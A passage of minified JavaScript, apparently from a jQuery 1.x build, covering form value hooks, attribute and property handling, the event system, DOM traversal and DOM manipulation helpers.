o;1===this.nodeType&&(o=i?e.call(this,n,x(this).val()):e,null==o?o="":"number"==typeof o?o+="":x.isArray(o)&&(o=x.map(o,function(e){return null==e?"":e+""})),r=x.valHooks[this.type]||x.valHooks[this.nodeName.toLowerCase()],r&&"set"in r&&r.set(this,o,"value")!==t||(this.value=o))});if(o)return r=x.valHooks[o.type]||x.valHooks[o.nodeName.toLowerCase()],r&&"get"in r&&(n=r.get(o,"value"))!==t?n:(n=o.value,"string"==typeof n?n.replace(V,""):null==n?"":n)}}}),x.extend({valHooks:{option:{get:function(e){var t=x.find.attr(e,"value");return null!=t?t:e.text}},select:{get:function(e){var t,n,r=e.options,i=e.selectedIndex,o="select-one"===e.type||0>i,a=o?null:[],s=o?i+1:r.length,l=0>i?s:o?i:0;for(;s>l;l++)if(n=r[l],!(!n.selected&&l!==i||(x.support.optDisabled?n.disabled:null!==n.getAttribute("disabled"))||n.parentNode.disabled&&x.nodeName(n.parentNode,"optgroup"))){if(t=x(n).val(),o)return t;a.push(t)}return a},set:function(e,t){var n,r,i=e.options,o=x.makeArray(t),a=i.length;while(a--)r=i[a],(r.selected=x.inArray(x(r).val(),o)>=0)&&(n=!0);return n||(e.selectedIndex=-1),o}}},attr:function(e,n,r){var o,a,s=e.nodeType;if(e&&3!==s&&8!==s&&2!==s)return typeof e.getAttribute===i?x.prop(e,n,r):(1===s&&x.isXMLDoc(e)||(n=n.toLowerCase(),o=x.attrHooks[n]||(x.expr.match.bool.test(n)?X:z)),r===t?o&&"get"in o&&null!==(a=o.get(e,n))?a:(a=x.find.attr(e,n),null==a?t:a):null!==r?o&&"set"in o&&(a=o.set(e,r,n))!==t?a:(e.setAttribute(n,r+""),r):(x.removeAttr(e,n),t))},removeAttr:function(e,t){var n,r,i=0,o=t&&t.match(T);if(o&&1===e.nodeType)while(n=o[i++])r=x.propFix[n]||n,x.expr.match.bool.test(n)?K&&Q||!G.test(n)?e[r]=!1:e[x.camelCase("default-"+n)]=e[r]=!1:x.attr(e,n,""),e.removeAttribute(Q?n:r)},attrHooks:{type:{set:function(e,t){if(!x.support.radioValue&&"radio"===t&&x.nodeName(e,"input")){var n=e.value;return e.setAttribute("type",t),n&&(e.value=n),t}}}},propFix:{"for":"htmlFor","class":"className"},prop:function(e,n,r){var i,o,a,s=e.nodeType;if(e&&3!==s&&8!==s&&2!==s)return a=1!==s||!x.isXMLDoc(e),a&&(n=x.propFix[n]||n,o=x.propHooks[n]),r!==t?o&&"set"in o&&(i=o.set(e,r,n))!==t?i:e[n]=r:o&&"get"in o&&null!==(i=o.get(e,n))?i:e[n]},propHooks:{tabIndex:{get:function(e){var t=x.find.attr(e,"tabindex");return t?parseInt(t,10):Y.test(e.nodeName)||J.test(e.nodeName)&&e.href?0:-1}}}}),X={set:function(e,t,n){return t===!1?x.removeAttr(e,n):K&&Q||!G.test(n)?e.setAttribute(!Q&&x.propFix[n]||n,n):e[x.camelCase("default-"+n)]=e[n]=!0,n}},x.each(x.expr.match.bool.source.match(/\w+/g),function(e,n){var r=x.expr.attrHandle[n]||x.find.attr;x.expr.attrHandle[n]=K&&Q||!G.test(n)?function(e,n,i){var o=x.expr.attrHandle[n],a=i?t:(x.expr.attrHandle[n]=t)!=r(e,n,i)?n.toLowerCase():null;return x.expr.attrHandle[n]=o,a}:function(e,n,r){return r?t:e[x.camelCase("default-"+n)]?n.toLowerCase():null}}),K&&Q||(x.attrHooks.value={set:function(e,n,r){return x.nodeName(e,"input")?(e.defaultValue=n,t):z&&z.set(e,n,r)}}),Q||(z={set:function(e,n,r){var i=e.getAttributeNode(r);return i||e.setAttributeNode(i=e.ownerDocument.createAttribute(r)),i.value=n+="","value"===r||n===e.getAttribute(r)?n:t}},x.expr.attrHandle.id=x.expr.attrHandle.name=x.expr.attrHandle.coords=function(e,n,r){var i;return r?t:(i=e.getAttributeNode(n))&&""!==i.value?i.value:null},x.valHooks.button={get:function(e,n){var r=e.getAttributeNode(n);return r&&r.specified?r.value:t},set:z.set},x.attrHooks.contenteditable={set:function(e,t,n){z.set(e,""===t?!1:t,n)}},x.each(["width","height"],function(e,n){x.attrHooks[n]={set:function(e,r){return""===r?(e.setAttribute(n,"auto"),r):t}}})),x.support.hrefNormalized||x.each(["href","src"],function(e,t){x.propHooks[t]={get:function(e){return e.getAttribute(t,4)}}}),x.support.style||(x.attrHooks.style={get:function(e){return e.style.cssText||t},set:function(e,t){return e.style.cssText=t+""}}),x.support.optSelected||(x.propHooks.selected={get:function(e){var t=e.parentNode;return t&&(t.selectedIndex,t.parentNode&&t.parentNode.selectedIndex),null}}),x.each(["tabIndex","readOnly","maxLength","cellSpacing","cellPadding","rowSpan","colSpan","useMap","frameBorder","contentEditable"],function(){x.propFix[this.toLowerCase()]=this}),x.support.enctype||(x.propFix.enctype="encoding"),x.each(["radio","checkbox"],function(){x.valHooks[this]={set:function(e,n){return x.isArray(n)?e.checked=x.inArray(x(e).val(),n)>=0:t}},x.support.checkOn||(x.valHooks[this].get=function(e){return null===e.getAttribute("value")?"on":e.value})});var Z=/^(?:input|select|textarea)$/i,et=/^key/,tt=/^(?:mouse|contextmenu)|click/,nt=/^(?:focusinfocus|focusoutblur)$/,rt=/^([^.]*)(?:\.(.+)|)$/;function it(){return!0}function ot(){return!1}function at(){try{return a.activeElement}catch(e){}}x.event={global:{},add:function(e,n,r,o,a){var s,l,u,c,p,f,d,h,g,m,y,v=x._data(e);if(v){r.handler&&(c=r,r=c.handler,a=c.selector),r.guid||(r.guid=x.guid++),(l=v.events)||(l=v.events={}),(f=v.handle)||(f=v.handle=function(e){return typeof x===i||e&&x.event.triggered===e.type?t:x.event.dispatch.apply(f.elem,arguments)},f.elem=e),n=(n||"").match(T)||[""],u=n.length;while(u--)s=rt.exec(n[u])||[],g=y=s[1],m=(s[2]||"").split(".").sort(),g&&(p=x.event.special[g]||{},g=(a?p.delegateType:p.bindType)||g,p=x.event.special[g]||{},d=x.extend({type:g,origType:y,data:o,handler:r,guid:r.guid,selector:a,needsContext:a&&x.expr.match.needsContext.test(a),namespace:m.join(".")},c),(h=l[g])||(h=l[g]=[],h.delegateCount=0,p.setup&&p.setup.call(e,o,m,f)!==!1||(e.addEventListener?e.addEventListener(g,f,!1):e.attachEvent&&e.attachEvent("on"+g,f))),p.add&&(p.add.call(e,d),d.handler.guid||(d.handler.guid=r.guid)),a?h.splice(h.delegateCount++,0,d):h.push(d),x.event.global[g]=!0);e=null}},remove:function(e,t,n,r,i){var o,a,s,l,u,c,p,f,d,h,g,m=x.hasData(e)&&x._data(e);if(m&&(c=m.events)){t=(t||"").match(T)||[""],u=t.length;while(u--)if(s=rt.exec(t[u])||[],d=g=s[1],h=(s[2]||"").split(".").sort(),d){p=x.event.special[d]||{},d=(r?p.delegateType:p.bindType)||d,f=c[d]||[],s=s[2]&&RegExp("(^|\\.)"+h.join("\\.(?:.*\\.|)")+"(\\.|$)"),l=o=f.length;while(o--)a=f[o],!i&&g!==a.origType||n&&n.guid!==a.guid||s&&!s.test(a.namespace)||r&&r!==a.selector&&("**"!==r||!a.selector)||(f.splice(o,1),a.selector&&f.delegateCount--,p.remove&&p.remove.call(e,a));l&&!f.length&&(p.teardown&&p.teardown.call(e,h,m.handle)!==!1||x.removeEvent(e,d,m.handle),delete c[d])}else for(d in c)x.event.remove(e,d+t[u],n,r,!0);x.isEmptyObject(c)&&(delete m.handle,x._removeData(e,"events"))}},trigger:function(n,r,i,o){var s,l,u,c,p,f,d,h=[i||a],g=v.call(n,"type")?n.type:n,m=v.call(n,"namespace")?n.namespace.split("."):[];if(u=f=i=i||a,3!==i.nodeType&&8!==i.nodeType&&!nt.test(g+x.event.triggered)&&(g.indexOf(".")>=0&&(m=g.split("."),g=m.shift(),m.sort()),l=0>g.indexOf(":")&&"on"+g,n=n[x.expando]?n:new x.Event(g,"object"==typeof n&&n),n.isTrigger=o?2:3,n.namespace=m.join("."),n.namespace_re=n.namespace?RegExp("(^|\\.)"+m.join("\\.(?:.*\\.|)")+"(\\.|$)"):null,n.result=t,n.target||(n.target=i),r=null==r?[n]:x.makeArray(r,[n]),p=x.event.special[g]||{},o||!p.trigger||p.trigger.apply(i,r)!==!1)){if(!o&&!p.noBubble&&!x.isWindow(i)){for(c=p.delegateType||g,nt.test(c+g)||(u=u.parentNode);u;u=u.parentNode)h.push(u),f=u;f===(i.ownerDocument||a)&&h.push(f.defaultView||f.parentWindow||e)}d=0;while((u=h[d++])&&!n.isPropagationStopped())n.type=d>1?c:p.bindType||g,s=(x._data(u,"events")||{})[n.type]&&x._data(u,"handle"),s&&s.apply(u,r),s=l&&u[l],s&&x.acceptData(u)&&s.apply&&s.apply(u,r)===!1&&n.preventDefault();if(n.type=g,!o&&!n.isDefaultPrevented()&&(!p._default||p._default.apply(h.pop(),r)===!1)&&x.acceptData(i)&&l&&i[g]&&!x.isWindow(i)){f=i[l],f&&(i[l]=null),x.event.triggered=g;try{i[g]()}catch(y){}x.event.triggered=t,f&&(i[l]=f)}return n.result}},dispatch:function(e){e=x.event.fix(e);var n,r,i,o,a,s=[],l=g.call(arguments),u=(x._data(this,"events")||{})[e.type]||[],c=x.event.special[e.type]||{};if(l[0]=e,e.delegateTarget=this,!c.preDispatch||c.preDispatch.call(this,e)!==!1){s=x.event.handlers.call(this,e,u),n=0;while((o=s[n++])&&!e.isPropagationStopped()){e.currentTarget=o.elem,a=0;while((i=o.handlers[a++])&&!e.isImmediatePropagationStopped())(!e.namespace_re||e.namespace_re.test(i.namespace))&&(e.handleObj=i,e.data=i.data,r=((x.event.special[i.origType]||{}).handle||i.handler).apply(o.elem,l),r!==t&&(e.result=r)===!1&&(e.preventDefault(),e.stopPropagation()))}return c.postDispatch&&c.postDispatch.call(this,e),e.result}},handlers:function(e,n){var r,i,o,a,s=[],l=n.delegateCount,u=e.target;if(l&&u.nodeType&&(!e.button||"click"!==e.type))for(;u!=this;u=u.parentNode||this)if(1===u.nodeType&&(u.disabled!==!0||"click"!==e.type)){for(o=[],a=0;l>a;a++)i=n[a],r=i.selector+" ",o[r]===t&&(o[r]=i.needsContext?x(r,this).index(u)>=0:x.find(r,this,null,[u]).length),o[r]&&o.push(i);o.length&&s.push({elem:u,handlers:o})}return n.length>l&&s.push({elem:this,handlers:n.slice(l)}),s},fix:function(e){if(e[x.expando])return e;var t,n,r,i=e.type,o=e,s=this.fixHooks[i];s||(this.fixHooks[i]=s=tt.test(i)?this.mouseHooks:et.test(i)?this.keyHooks:{}),r=s.props?this.props.concat(s.props):this.props,e=new x.Event(o),t=r.length;while(t--)n=r[t],e[n]=o[n];return e.target||(e.target=o.srcElement||a),3===e.target.nodeType&&(e.target=e.target.parentNode),e.metaKey=!!e.metaKey,s.filter?s.filter(e,o):e},props:"altKey bubbles cancelable ctrlKey currentTarget eventPhase metaKey relatedTarget shiftKey target timeStamp view which".split(" "),fixHooks:{},keyHooks:{props:"char charCode key keyCode".split(" "),filter:function(e,t){return null==e.which&&(e.which=null!=t.charCode?t.charCode:t.keyCode),e}},mouseHooks:{props:"button buttons clientX clientY fromElement offsetX offsetY pageX pageY screenX screenY toElement".split(" "),filter:function(e,n){var r,i,o,s=n.button,l=n.fromElement;return null==e.pageX&&null!=n.clientX&&(i=e.target.ownerDocument||a,o=i.documentElement,r=i.body,e.pageX=n.clientX+(o&&o.scrollLeft||r&&r.scrollLeft||0)-(o&&o.clientLeft||r&&r.clientLeft||0),e.pageY=n.clientY+(o&&o.scrollTop||r&&r.scrollTop||0)-(o&&o.clientTop||r&&r.clientTop||0)),!e.relatedTarget&&l&&(e.relatedTarget=l===e.target?n.toElement:l),e.which||s===t||(e.which=1&s?1:2&s?3:4&s?2:0),e}},special:{load:{noBubble:!0},focus:{trigger:function(){if(this!==at()&&this.focus)try{return this.focus(),!1}catch(e){}},delegateType:"focusin"},blur:{trigger:function(){return this===at()&&this.blur?(this.blur(),!1):t},delegateType:"focusout"},click:{trigger:function(){return x.nodeName(this,"input")&&"checkbox"===this.type&&this.click?(this.click(),!1):t},_default:function(e){return x.nodeName(e.target,"a")}},beforeunload:{postDispatch:function(e){e.result!==t&&(e.originalEvent.returnValue=e.result)}}},simulate:function(e,t,n,r){var i=x.extend(new x.Event,n,{type:e,isSimulated:!0,originalEvent:{}});r?x.event.trigger(i,null,t):x.event.dispatch.call(t,i),i.isDefaultPrevented()&&n.preventDefault()}},x.removeEvent=a.removeEventListener?function(e,t,n){e.removeEventListener&&e.removeEventListener(t,n,!1)}:function(e,t,n){var r="on"+t;e.detachEvent&&(typeof e[r]===i&&(e[r]=null),e.detachEvent(r,n))},x.Event=function(e,n){return this instanceof x.Event?(e&&e.type?(this.originalEvent=e,this.type=e.type,this.isDefaultPrevented=e.defaultPrevented||e.returnValue===!1||e.getPreventDefault&&e.getPreventDefault()?it:ot):this.type=e,n&&x.extend(this,n),this.timeStamp=e&&e.timeStamp||x.now(),this[x.expando]=!0,t):new x.Event(e,n)},x.Event.prototype={isDefaultPrevented:ot,isPropagationStopped:ot,isImmediatePropagationStopped:ot,preventDefault:function(){var e=this.originalEvent;this.isDefaultPrevented=it,e&&(e.preventDefault?e.preventDefault():e.returnValue=!1)},stopPropagation:function(){var e=this.originalEvent;this.isPropagationStopped=it,e&&(e.stopPropagation&&e.stopPropagation(),e.cancelBubble=!0)},stopImmediatePropagation:function(){this.isImmediatePropagationStopped=it,this.stopPropagation()}},x.each({mouseenter:"mouseover",mouseleave:"mouseout"},function(e,t){x.event.special[e]={delegateType:t,bindType:t,handle:function(e){var n,r=this,i=e.relatedTarget,o=e.handleObj;return(!i||i!==r&&!x.contains(r,i))&&(e.type=o.origType,n=o.handler.apply(this,arguments),e.type=t),n}}}),x.support.submitBubbles||(x.event.special.submit={setup:function(){return x.nodeName(this,"form")?!1:(x.event.add(this,"click._submit keypress._submit",function(e){var n=e.target,r=x.nodeName(n,"input")||x.nodeName(n,"button")?n.form:t;r&&!x._data(r,"submitBubbles")&&(x.event.add(r,"submit._submit",function(e){e._submit_bubble=!0}),x._data(r,"submitBubbles",!0))}),t)},postDispatch:function(e){e._submit_bubble&&(delete e._submit_bubble,this.parentNode&&!e.isTrigger&&x.event.simulate("submit",this.parentNode,e,!0))},teardown:function(){return x.nodeName(this,"form")?!1:(x.event.remove(this,"._submit"),t)}}),x.support.changeBubbles||(x.event.special.change={setup:function(){return Z.test(this.nodeName)?(("checkbox"===this.type||"radio"===this.type)&&(x.event.add(this,"propertychange._change",function(e){"checked"===e.originalEvent.propertyName&&(this._just_changed=!0)}),x.event.add(this,"click._change",function(e){this._just_changed&&!e.isTrigger&&(this._just_changed=!1),x.event.simulate("change",this,e,!0)})),!1):(x.event.add(this,"beforeactivate._change",function(e){var t=e.target;Z.test(t.nodeName)&&!x._data(t,"changeBubbles")&&(x.event.add(t,"change._change",function(e){!this.parentNode||e.isSimulated||e.isTrigger||x.event.simulate("change",this.parentNode,e,!0)}),x._data(t,"changeBubbles",!0))}),t)},handle:function(e){var n=e.target;return this!==n||e.isSimulated||e.isTrigger||"radio"!==n.type&&"checkbox"!==n.type?e.handleObj.handler.apply(this,arguments):t},teardown:function(){return x.event.remove(this,"._change"),!Z.test(this.nodeName)}}),x.support.focusinBubbles||x.each({focus:"focusin",blur:"focusout"},function(e,t){var n=0,r=function(e){x.event.simulate(t,e.target,x.event.fix(e),!0)};x.event.special[t]={setup:function(){0===n++&&a.addEventListener(e,r,!0)},teardown:function(){0===--n&&a.removeEventListener(e,r,!0)}}}),x.fn.extend({on:function(e,n,r,i,o){var a,s;if("object"==typeof e){"string"!=typeof n&&(r=r||n,n=t);for(a in e)this.on(a,n,r,e[a],o);return this}if(null==r&&null==i?(i=n,r=n=t):null==i&&("string"==typeof n?(i=r,r=t):(i=r,r=n,n=t)),i===!1)i=ot;else if(!i)return this;return 1===o&&(s=i,i=function(e){return x().off(e),s.apply(this,arguments)},i.guid=s.guid||(s.guid=x.guid++)),this.each(function(){x.event.add(this,e,i,r,n)})},one:function(e,t,n,r){return this.on(e,t,n,r,1)},off:function(e,n,r){var i,o;if(e&&e.preventDefault&&e.handleObj)return i=e.handleObj,x(e.delegateTarget).off(i.namespace?i.origType+"."+i.namespace:i.origType,i.selector,i.handler),this;if("object"==typeof e){for(o in e)this.off(o,n,e[o]);return this}return(n===!1||"function"==typeof n)&&(r=n,n=t),r===!1&&(r=ot),this.each(function(){x.event.remove(this,e,r,n)})},trigger:function(e,t){return this.each(function(){x.event.trigger(e,t,this)})},triggerHandler:function(e,n){var r=this[0];return r?x.event.trigger(e,n,r,!0):t}});var st=/^.[^:#\[\.,]*$/,lt=/^(?:parents|prev(?:Until|All))/,ut=x.expr.match.needsContext,ct={children:!0,contents:!0,next:!0,prev:!0};x.fn.extend({find:function(e){var t,n=[],r=this,i=r.length;if("string"!=typeof e)return this.pushStack(x(e).filter(function(){for(t=0;i>t;t++)if(x.contains(r[t],this))return!0}));for(t=0;i>t;t++)x.find(e,r[t],n);return n=this.pushStack(i>1?x.unique(n):n),n.selector=this.selector?this.selector+" "+e:e,n},has:function(e){var t,n=x(e,this),r=n.length;return this.filter(function(){for(t=0;r>t;t++)if(x.contains(this,n[t]))return!0})},not:function(e){return this.pushStack(ft(this,e||[],!0))},filter:function(e){return this.pushStack(ft(this,e||[],!1))},is:function(e){return!!ft(this,"string"==typeof e&&ut.test(e)?x(e):e||[],!1).length},closest:function(e,t){var n,r=0,i=this.length,o=[],a=ut.test(e)||"string"!=typeof e?x(e,t||this.context):0;for(;i>r;r++)for(n=this[r];n&&n!==t;n=n.parentNode)if(11>n.nodeType&&(a?a.index(n)>-1:1===n.nodeType&&x.find.matchesSelector(n,e))){n=o.push(n);break}return this.pushStack(o.length>1?x.unique(o):o)},index:function(e){return e?"string"==typeof e?x.inArray(this[0],x(e)):x.inArray(e.jquery?e[0]:e,this):this[0]&&this[0].parentNode?this.first().prevAll().length:-1},add:function(e,t){var n="string"==typeof e?x(e,t):x.makeArray(e&&e.nodeType?[e]:e),r=x.merge(this.get(),n);return this.pushStack(x.unique(r))},addBack:function(e){return this.add(null==e?this.prevObject:this.prevObject.filter(e))}});function pt(e,t){do e=e[t];while(e&&1!==e.nodeType);return e}x.each({parent:function(e){var t=e.parentNode;return t&&11!==t.nodeType?t:null},parents:function(e){return x.dir(e,"parentNode")},parentsUntil:function(e,t,n){return x.dir(e,"parentNode",n)},next:function(e){return pt(e,"nextSibling")},prev:function(e){return pt(e,"previousSibling")},nextAll:function(e){return x.dir(e,"nextSibling")},prevAll:function(e){return x.dir(e,"previousSibling")},nextUntil:function(e,t,n){return x.dir(e,"nextSibling",n)},prevUntil:function(e,t,n){return x.dir(e,"previousSibling",n)},siblings:function(e){return x.sibling((e.parentNode||{}).firstChild,e)},children:function(e){return x.sibling(e.firstChild)},contents:function(e){return x.nodeName(e,"iframe")?e.contentDocument||e.contentWindow.document:x.merge([],e.childNodes)}},function(e,t){x.fn[e]=function(n,r){var i=x.map(this,t,n);return"Until"!==e.slice(-5)&&(r=n),r&&"string"==typeof r&&(i=x.filter(r,i)),this.length>1&&(ct[e]||(i=x.unique(i)),lt.test(e)&&(i=i.reverse())),this.pushStack(i)}}),x.extend({filter:function(e,t,n){var r=t[0];return n&&(e=":not("+e+")"),1===t.length&&1===r.nodeType?x.find.matchesSelector(r,e)?[r]:[]:x.find.matches(e,x.grep(t,function(e){return 1===e.nodeType}))},dir:function(e,n,r){var i=[],o=e[n];while(o&&9!==o.nodeType&&(r===t||1!==o.nodeType||!x(o).is(r)))1===o.nodeType&&i.push(o),o=o[n];return i},sibling:function(e,t){var n=[];for(;e;e=e.nextSibling)1===e.nodeType&&e!==t&&n.push(e);return n}});function ft(e,t,n){if(x.isFunction(t))return x.grep(e,function(e,r){return!!t.call(e,r,e)!==n});if(t.nodeType)return x.grep(e,function(e){return e===t!==n});if("string"==typeof t){if(st.test(t))return x.filter(t,e,n);t=x.filter(t,e)}return x.grep(e,function(e){return x.inArray(e,t)>=0!==n})}function dt(e){var t=ht.split("|"),n=e.createDocumentFragment();if(n.createElement)while(t.length)n.createElement(t.pop());return n}var ht="abbr|article|aside|audio|bdi|canvas|data|datalist|details|figcaption|figure|footer|header|hgroup|mark|meter|nav|output|progress|section|summary|time|video",gt=/ jQuery\d+="(?:null|\d+)"/g,mt=RegExp("<(?:"+ht+")[\\s/>]","i"),yt=/^\s+/,vt=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,bt=/<([\w:]+)/,xt=/<tbody/i,wt=/<|&#?\w+;/,Tt=/<(?:script|style|link)/i,Ct=/^(?:checkbox|radio)$/i,Nt=/checked\s*(?:[^=]|=\s*.checked.)/i,kt=/^$|\/(?:java|ecma)script/i,Et=/^true\/(.*)/,St=/^\s*<!(?:\[CDATA\[|--)|(?:\]\]|--)>\s*$/g,At={option:[1,"<select multiple='multiple'>","</select>"],legend:[1,"<fieldset>","</fieldset>"],area:[1,"<map>","</map>"],param:[1,"<object>","</object>"],thead:[1,"<table>","</table>"],tr:[2,"<table><tbody>","</tbody></table>"],col:[2,"<table><tbody></tbody><colgroup>","</colgroup></table>"],td:[3,"<table><tbody><tr>","</tr></tbody></table>"],_default:x.support.htmlSerialize?[0,"",""]:[1,"X<div>","</div>"]},jt=dt(a),Dt=jt.appendChild(a.createElement("div"));At.optgroup=At.option,At.tbody=At.tfoot=At.colgroup=At.caption=At.thead,At.th=At.td,x.fn.extend({text:function(e){return x.access(this,function(e){return e===t?x.text(this):this.empty().append((this[0]&&this[0].ownerDocument||a).createTextNode(e))},null,e,arguments.length)},append:function(){return this.domManip(arguments,function(e){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var t=Lt(this,e);t.appendChild(e)}})},prepend:function(){return this.domManip(arguments,function(e){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var t=Lt(this,e);t.insertBefore(e,t.firstChild)}})},before:function(){return this.domManip(arguments,function(e){this.parentNode&&this.parentNode.insertBefore(e,this)})},after:function(){return this.domManip(arguments,function(e){this.parentNode&&this.parentNode.insertBefore(e,this.nextSibling)})},remove:function(e,t){var n,r=e?x.filter(e,this):this,i=0;for(;null!=(n=r[i]);i++)t||1!==n.nodeType||x.cleanData(Ft(n)),n.parentNode&&(t&&x.contains(n.ownerDocument,n)&&_t(Ft(n,"script")),n.parentNode.removeChild(n));return this},empty:function(){var e,t=0;for(;null!=(e=this[t]);t++){1===e.nodeType&&x.cleanData(Ft(e,!1));while(e.firstChild)e.removeChild(e.firstChild);e.options&&x.nodeName(e,"select")&&(e.options.length=0)}return this},clone:function(e,t){return e=null==e?!1:e,t=null==t?e:t,this.map(function(){return x.clone(this,e,t)})},html:function(e){return x.access(this,function(e){var n=this[0]||{},r=0,i=this.length;if(e===t)return 1===n.nodeType?n.innerHTML.replace(gt,""):t;if(!("string"!=typeof e||Tt.test(e)||!x.support.htmlSerialize&&mt.test(e)||!x.support.leadingWhitespace&&yt.test(e)||At[(bt.exec(e)||["",""])[1].toLowerCase()])){e=e.replace(vt,"<$1></$2>");try{for(;i>r;r++)n=this[r]||{},1===n.nodeType&&(x.cleanData(Ft(n,!1)),n.innerHTML=e);n=0}catch(o){}}n&&this.empty().append(e)},null,e,arguments.length)},replaceWith:function(){var e=x.map(this,function(e){return[e.nextSibling,e.parentNode]}),t=0;return this.domManip(arguments,function(n){var r=e[t++],i=e[t++];i&&(r&&r.parentNode!==i&&(r=this.nextSibling),x(this).remove(),i.insertBefore(n,r))},!0),t?this:this.remove()},detach:function(e){return this.remove(e,!0)},domManip:function(e,t,n){e=d.apply([],e);var r,i,o,a,s,l,u=0,c=this.length,p=this,f=c-1,h=e[0],g=x.isFunction(h);if(g||!(1>=c||"string"!=typeof h||x.support.checkClone)&&Nt.test(h))return this.each(function(r){var i=p.eq(r);g&&(e[0]=h.call(this,r,i.html())),i.domManip(e,t,n)});if(c&&(l=x.buildFragment(e,this[0].ownerDocument,!1,!n&&this),r=l.firstChild,1===l.childNodes.length&&(l=r),r)){for(a=x.map(Ft(l,"script"),Ht),o=a.length;c>u;u++)i=l,u!==f&&(i=x.clone(i,!0,!0),o&&x.merge(a,Ft(i,"script"))),t.call(this[u],i,u);if(o)for(s=a[a.length-1].ownerDocument,x.map(a,qt),u=0;o>u;u++)i=a[u],kt.test(i.type||"")&&!x._data(i,"globalEval")&&x.contains(s,i)&&(i.src?x._evalUrl(i.src):x.globalEval((i.text||i.textContent||i.innerHTML||"").replace(St,"")));l=r=null}return this}});function Lt(e,t){return x.nodeName(e,"table")&&x.nodeName(1===t.nodeType?t:t.firstChild,"tr")?e.getElementsByTagName("tbody")[0]||e.appendChild(e.ownerDocument.createElement("tbody")):e}function Ht(e){return e.type=(null!==x.find.attr(e,"type"))+"/"+e.type,e}function qt(e){var t=Et.exec(e.type);return t?e.type=t[1]:e.removeAttribute("type"),e}function _t(e,t){var n,r=0;for(;null!=(n=e[r]);r++)x._data(n,"globalEval",!t||x._data(t[r],"globalEval"))}function Mt(e,t){if(1===t.nodeType&&x.hasData(e)){var n,r,i,o=x._data(e),a=x._data(t,o),s=o.events;if(s){delete a.handle,a.events={};for(n in s)for(r=0,i=s[n].length;i>r;r++)x.event.add(t,n,s[n][r])}a.data&&(a.data=x.extend({},a.data))}}function Ot(e,t){var n,r,i;if(1===t.nodeType){if(n=t.nodeName.toLowerCase(),!x.support.noCloneEvent&&t[x.expando]){i=x._data(t);for(r in i.events)x.removeEvent(t,r,i.handle);t.removeAttribute(x.expando)}"script"===n&&t.text!==e.text?(Ht(t).text=e.text,qt(t)):"object"===n?(t.parentNode&&(t.outerHTML=e.outerHTML),x.support.html5Clone&&e.innerHTML&&!x.trim(t.innerHTML)&&(t.innerHTML=e.innerHTML)):"input"===n&&Ct.test(e.type)?(t.defaultChecked=t.checked=e.checked,t.value!==e.value&&(t.value=e.value)):"option"===n?t.defaultSelected=t.selected=e.defaultSelected:("input"===n||"textarea"===n)&&(t.defaultValue=e.defaultValue)}}x.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(e,t){x.fn[e]=function(e){var n,r=0,i=[],o=x(e),a=o.length-1;for(;a>=r;r++)n=r===a?this:this.clone(!0),x(o[r])[t](n),h.apply(i,n.get());return this.pushStack(i)}});function Ft(e,n){var r,o,a=0,s=typeof e.getElementsByTagName!==i?e.getElementsByTagName(n||"*"):typeof e.querySelectorAll!==i?e.querySelectorAll(n||"*"):t;if(!s)for(s=[],r=e.childNodes||e;null!=(o=r[a]);a++)!n||x.nodeName(o,n)?s.push(o):x.merge(s,Ft(o,n));return n===t||n&&x.nodeName(e,n)?x.merge([e],s):s}function Bt(e){Ct.test(e.type)&&(e.defaultChecked=e.checked)}x.extend({clone:function(e,t,n){var r,i,o,a,s,l=x.contains(e.ownerDocument,e);if(x.support.html5Clone||x.isXMLDoc(e)||!mt.test("<"+e.nodeName+">")?o=e.cloneNode(!0):(Dt.innerHTML=e.outerHTML,Dt.removeChild(o=Dt.firstChild)),!(x.support.noCloneEvent&&x.support.noCloneChecked||1!==e.nodeType&&11!==e.nodeType||x.isXMLDoc(e)))for(r=Ft(o),s=Ft(e),a=0;null!=(i=s[a]);++a)r[a]&&Ot(i,r[a]);if(t)if(n)for(s=s||Ft(e),r=r||Ft(o),a=0;null!=(i=s[a]);a++)Mt(i,r[a]);else Mt(e,o);return r=Ft(o,"script"),r.length>0&&_t(r,!l&&Ft(e,"script")),r=s=i=null,o},buildFragment:function(e,t,n,r){var i,o,a,s,l,u,c,p=e.length,f=dt(t),d=[],h=0;for(;p>h;h++)if(o=e[h],o||0===o)if("object"===x.type(o))x.merge(d,o.nodeType?[o]:o);else if(wt.test(o)){s=s||f.appendChild(t.createElement("div")),l=(bt.exec(o)||["",""])[1].toLowerCase(),c=At[l]||At._default,s.innerHTML=c[1]+o.replace(vt,"<$1></$2>")+c[2],i=c[0];while(i--)s=s.lastChild;if(!x.support.leadingWhitespace&&yt.test(o)&&d.push(t.createTextNode(yt.exec(o)[0])),!x.support.tbody){o="table"!==l||xt.test(o)?"<table>"!==c[1]||xt.test(o)?0:s:s.firstChild,i=o&&o.childNodes.length;while(i--)x.nodeName(u=o.childNodes[i],"tbody")&&!u.childNodes.length&&o.removeChild(u)}x.merge(d,s.childNodes),s.textContent="";while(s.firstChild)s.removeChild(s.firstChild);s=f.lastChild}else d.push(t.createTextNode(o));s&&f.removeChild(s),x.support.appendChecked||x.grep(Ft(d,"input"),Bt),h=0;while(o=d[h++])if((!r||-1===x.inArray(o,r))&&(a=x.contains(o.ownerDocument,o),s=Ft(f.appendChild(o),"script"),a&&_t(s),n)){i=0;while(o=s[i++])kt.test(o.type||"")&&n.push(o)}return s=null,f},cleanData:function(e,t){var n,r,o,a,s=0,l=x.expando,u=x.cache,c=x.support.deleteExpando,f=x.event.special;for(;null!=(n=e[s]);s++)if((t||x.acceptData(n))&&(o=n[l],a=o&&u[o])){if(a.events)for(r in a.events)f[r]?x.event.remove(n,r):x.removeEvent(n,r,a.handle);
